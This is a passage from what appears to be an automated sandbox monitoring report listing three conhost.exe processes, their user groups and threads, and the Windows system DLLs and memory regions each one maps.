0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Thread: id = 27 os_tid = 0xc20 Thread: id = 43 os_tid = 0xc88 Thread: id = 62 os_tid = 0xcf0 Thread: id = 250 os_tid = 0x10ec Process: id = "27" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x75d64000" os_pid = "0xc24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xbd4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 575 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 576 start_va = 0xa8716a0000 end_va = 0xa8716bffff entry_point = 0x0 region_type = private name = "private_0x000000a8716a0000" filename = "" Region: id = 577 start_va = 0xa8716c0000 end_va = 0xa8716d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a8716c0000" filename = "" Region: id = 578 start_va = 0xa8716e0000 end_va = 0xa87171ffff entry_point = 0x0 region_type = private name = "private_0x000000a8716e0000" filename = "" Region: id = 579 start_va = 0x7df5ff760000 end_va = 0x7ff5ff75ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff760000" filename = "" Region: id = 580 start_va = 0x7ff6c48d0000 end_va = 0x7ff6c48f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c48d0000" filename = "" Region: id = 581 start_va = 0x7ff6c48fc000 end_va = 0x7ff6c48fcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48fc000" filename = "" Region: id = 582 start_va = 0x7ff6c48fe000 end_va = 0x7ff6c48fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48fe000" filename = "" Region: id = 583 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 584 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 585 start_va = 0xa8717b0000 end_va = 0xa8718affff entry_point = 0x0 region_type = private name = "private_0x000000a8717b0000" filename = "" Region: id = 586 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 587 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1557 start_va = 0xa8716a0000 end_va = 0xa8716affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a8716a0000" filename = "" Region: id = 1558 start_va = 0xa8716b0000 end_va = 0xa8716b6fff entry_point = 0x0 region_type = private name = "private_0x000000a8716b0000" filename = "" Region: id = 1559 start_va = 0xa871720000 end_va = 0xa87175ffff entry_point = 0x0 region_type = private name = "private_0x000000a871720000" filename = "" Region: id = 1560 start_va = 0xa871760000 end_va = 0xa871760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a871760000" filename = "" Region: id = 1561 start_va = 0xa871770000 end_va = 0xa871776fff entry_point = 0x0 region_type = private name = "private_0x000000a871770000" filename = "" Region: id = 1562 start_va = 0xa871780000 end_va = 0xa871780fff entry_point = 0x0 region_type = private name = "private_0x000000a871780000" filename = "" Region: id = 1563 start_va = 0xa871790000 end_va = 0xa871790fff entry_point = 0x0 region_type = private name = "private_0x000000a871790000" filename = "" Region: id = 1564 start_va = 0xa8718b0000 end_va = 0xa87196dfff entry_point = 0xa8718b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1565 start_va = 0xa8719d0000 end_va = 0xa8719dffff entry_point = 0x0 region_type = private name = "private_0x000000a8719d0000" filename = "" Region: id = 1566 start_va = 0xa8719e0000 end_va = 0xa871b67fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a8719e0000" filename = "" Region: id = 1567 start_va = 0xa871b70000 end_va = 0xa871cf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a871b70000" filename = "" Region: id = 1568 start_va = 0xa871d00000 end_va = 0xa8730fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a871d00000" filename = "" Region: id = 1569 start_va = 0x7ff6c47d0000 end_va = 0x7ff6c48cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47d0000" filename = "" Region: id = 1570 start_va = 0x7ff6c48fa000 end_va = 0x7ff6c48fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48fa000" filename = "" Region: id = 1571 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1572 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1573 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1574 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1575 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1576 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1577 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1578 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1579 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1580 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1581 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1582 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 28 os_tid = 0xc28 Thread: id = 44 os_tid = 0xc8c Thread: id = 108 os_tid = 0xe50 Thread: id = 253 os_tid = 0x10f8 Process: id = "28" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xe479000" os_pid = "0xc2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x758" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 588 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 589 start_va = 0xbcb7370000 end_va = 0xbcb738ffff entry_point = 0x0 region_type = private name = "private_0x000000bcb7370000" filename = "" Region: id = 590 start_va = 0xbcb7390000 end_va = 0xbcb73a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb7390000" filename = "" Region: id = 591 start_va = 0xbcb73b0000 end_va = 0xbcb73effff entry_point = 0x0 region_type = private name = "private_0x000000bcb73b0000" filename = "" Region: id = 592 start_va = 0x7df5ffb30000 end_va = 0x7ff5ffb2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb30000" filename = "" Region: id = 593 start_va = 0x7ff6c4560000 end_va = 0x7ff6c4582fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4560000" filename = "" Region: id = 594 start_va = 0x7ff6c4583000 end_va = 0x7ff6c4583fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4583000" filename = "" Region: id = 595 start_va = 0x7ff6c458e000 end_va = 0x7ff6c458ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c458e000" filename = "" Region: id = 596 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 597 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 598 start_va = 0xbcb75a0000 end_va = 0xbcb769ffff entry_point = 0x0 region_type = private name = "private_0x000000bcb75a0000" filename = "" Region: id = 599 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 600 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 802 start_va = 0xbcb7370000 end_va = 0xbcb737ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb7370000" filename = "" Region: id = 803 start_va = 0xbcb7380000 end_va = 0xbcb738ffff entry_point = 0x0 region_type = private name = "private_0x000000bcb7380000" filename = "" Region: id = 804 start_va = 0xbcb73f0000 end_va = 0xbcb74adfff entry_point = 0xbcb73f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 805 start_va = 0xbcb74b0000 end_va = 0xbcb74effff entry_point = 0x0 region_type = private name = "private_0x000000bcb74b0000" filename = "" Region: id = 806 start_va = 0xbcb74f0000 end_va = 0xbcb74f6fff entry_point = 0x0 region_type = private name = "private_0x000000bcb74f0000" filename = "" Region: id = 807 start_va = 0xbcb7500000 end_va = 0xbcb7500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb7500000" filename = "" Region: id = 808 start_va = 0xbcb7510000 end_va = 0xbcb7516fff entry_point = 0x0 region_type = private name = "private_0x000000bcb7510000" filename = "" Region: id = 809 start_va = 0xbcb7520000 end_va = 0xbcb7520fff entry_point = 0x0 region_type = private name = "private_0x000000bcb7520000" filename = "" Region: id = 810 start_va = 0xbcb7530000 end_va = 0xbcb7530fff entry_point = 0x0 region_type = private name = "private_0x000000bcb7530000" filename = "" Region: id = 811 start_va = 0xbcb76a0000 end_va = 0xbcb7827fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb76a0000" filename = "" Region: id = 812 start_va = 0xbcb7830000 end_va = 0xbcb79b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb7830000" filename = "" Region: id = 813 start_va = 0xbcb79c0000 end_va = 0xbcb8dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb79c0000" filename = "" Region: id = 814 start_va = 0x7ff6c4460000 end_va = 0x7ff6c455ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4460000" filename = "" Region: id = 815 start_va = 0x7ff6c458c000 end_va = 0x7ff6c458dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c458c000" filename = "" Region: id = 816 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 817 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 818 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 819 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 820 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 821 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 822 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 823 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 824 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 825 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 826 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 827 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3894 start_va = 0xbcb7540000 end_va = 0xbcb757ffff entry_point = 0x0 region_type = private name = "private_0x000000bcb7540000" filename = "" Region: id = 3895 start_va = 0xbcb7580000 end_va = 0xbcb7583fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb7580000" filename = "" Region: id = 3896 start_va = 0xbcb7590000 end_va = 0xbcb7596fff entry_point = 0x0 region_type = private name = "private_0x000000bcb7590000" filename = "" Region: id = 3897 start_va = 0xbcb8dc0000 end_va = 0xbcb8eccfff entry_point = 0x0 region_type = private name = "private_0x000000bcb8dc0000" filename = "" Region: id = 3898 start_va = 0xbcb8ed0000 end_va = 0xbcb8ed4fff entry_point = 0xbcb8ed0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3899 start_va = 0xbcb8ee0000 end_va = 0xbcb8ee0fff entry_point = 0xbcb8ee0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 3900 start_va = 0xbcb8ef0000 end_va = 0xbcb8ef1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb8ef0000" filename = "" Region: id = 3901 start_va = 0xbcb8f00000 end_va = 0xbcb8f00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb8f00000" filename = "" Region: id = 3902 start_va = 0xbcb8f10000 end_va = 0xbcb8f11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb8f10000" filename = "" Region: id = 3903 start_va = 0xbcb8f60000 end_va = 0xbcb8f6ffff entry_point = 0x0 region_type = private name = "private_0x000000bcb8f60000" filename = "" Region: id = 3904 start_va = 0xbcb8f80000 end_va = 0xbcb8f8ffff entry_point = 0x0 region_type = private name = "private_0x000000bcb8f80000" filename = "" Region: id = 3905 start_va = 0xbcb8f90000 end_va = 0xbcb92c6fff entry_point = 0xbcb8f90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3906 start_va = 0xbcb92d0000 end_va = 0xbcb94e8fff entry_point = 0x0 region_type = private name = "private_0x000000bcb92d0000" filename = "" Region: id = 3907 start_va = 0xbcb94f0000 end_va = 0xbcb970bfff entry_point = 0x0 region_type = private name = "private_0x000000bcb94f0000" filename = "" Region: id = 3908 start_va = 0xbcb9710000 end_va = 0xbcb992cfff entry_point = 0x0 region_type = private name = "private_0x000000bcb9710000" filename = "" Region: id = 3909 start_va = 0xbcb9930000 end_va = 0xbcb9a43fff entry_point = 0x0 region_type = private name = "private_0x000000bcb9930000" filename = "" Region: id = 3910 start_va = 0xbcb9a50000 end_va = 0xbcb9b07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bcb9a50000" filename = "" Region: id = 3911 start_va = 0x7ff6c458a000 end_va = 0x7ff6c458bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c458a000" filename = "" Region: id = 3912 start_va = 0x7ffbfb2d0000 end_va = 0x7ffbfb543fff entry_point = 0x7ffbfb2d0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 3913 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3914 start_va = 0x7ffbfe9a0000 end_va = 0x7ffbfe9c1fff entry_point = 0x7ffbfe9a0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3915 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3916 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3917 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3918 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3919 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3920 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3921 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3922 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3923 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3924 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 29 os_tid = 0xc30 Thread: id = 45 os_tid = 0xc90 Thread: id = 57 os_tid = 0xcdc Thread: id = 245 os_tid = 0x10d8 Process: id = "29" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xe4e0000" os_pid = "0xc34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xa34" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 601 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 602 start_va = 0x40062f0000 end_va = 0x400630ffff entry_point = 0x0 region_type = private name = "private_0x00000040062f0000" filename = "" Region: id = 603 start_va = 0x4006310000 end_va = 0x4006323fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004006310000" filename = "" Region: id = 604 start_va = 0x4006330000 end_va = 0x400636ffff entry_point = 0x0 region_type = private name = "private_0x0000004006330000" filename = "" Region: id = 605 start_va = 0x7df5ff5a0000 end_va = 0x7ff5ff59ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5a0000" filename = "" Region: id = 606 start_va = 0x7ff6c43e0000 end_va = 0x7ff6c4402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c43e0000" filename = "" Region: id = 607 start_va = 0x7ff6c440d000 end_va = 0x7ff6c440efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c440d000" filename = "" Region: id = 608 start_va = 0x7ff6c440f000 end_va = 0x7ff6c440ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c440f000" filename = "" Region: id = 609 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 610 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 611 start_va = 0x4006520000 end_va = 0x400661ffff entry_point = 0x0 region_type = private name = "private_0x0000004006520000" filename = "" Region: id = 612 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 613 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 776 start_va = 0x40062f0000 end_va = 0x40062fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000040062f0000" filename = "" Region: id = 777 start_va = 0x4006300000 end_va = 0x4006306fff entry_point = 0x0 region_type = private name = "private_0x0000004006300000" filename = "" Region: id = 778 start_va = 0x4006370000 end_va = 0x400642dfff entry_point = 0x4006370000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 779 start_va = 0x4006430000 end_va = 0x400646ffff entry_point = 0x0 region_type = private name = "private_0x0000004006430000" filename = "" Region: id = 780 start_va = 0x4006470000 end_va = 0x4006470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004006470000" filename = "" Region: id = 781 start_va = 0x4006480000 end_va = 0x4006486fff entry_point = 0x0 region_type = private name = "private_0x0000004006480000" filename = "" Region: id = 782 start_va = 0x4006490000 end_va = 0x4006490fff entry_point = 0x0 region_type = private name = "private_0x0000004006490000" filename = "" Region: id = 783 start_va = 0x40064a0000 end_va = 0x40064a0fff entry_point = 0x0 region_type = private name = "private_0x00000040064a0000" filename = "" Region: id = 784 start_va = 0x4006790000 end_va = 0x400679ffff entry_point = 0x0 region_type = private name = "private_0x0000004006790000" filename = "" Region: id = 785 start_va = 0x40067a0000 end_va = 0x4006927fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000040067a0000" filename = "" Region: id = 786 start_va = 0x4006930000 end_va = 0x4006ab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004006930000" filename = "" Region: id = 787 start_va = 0x4006ac0000 end_va = 0x4007ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004006ac0000" filename = "" Region: id = 788 start_va = 0x7ff6c42e0000 end_va = 0x7ff6c43dffff entry_point = 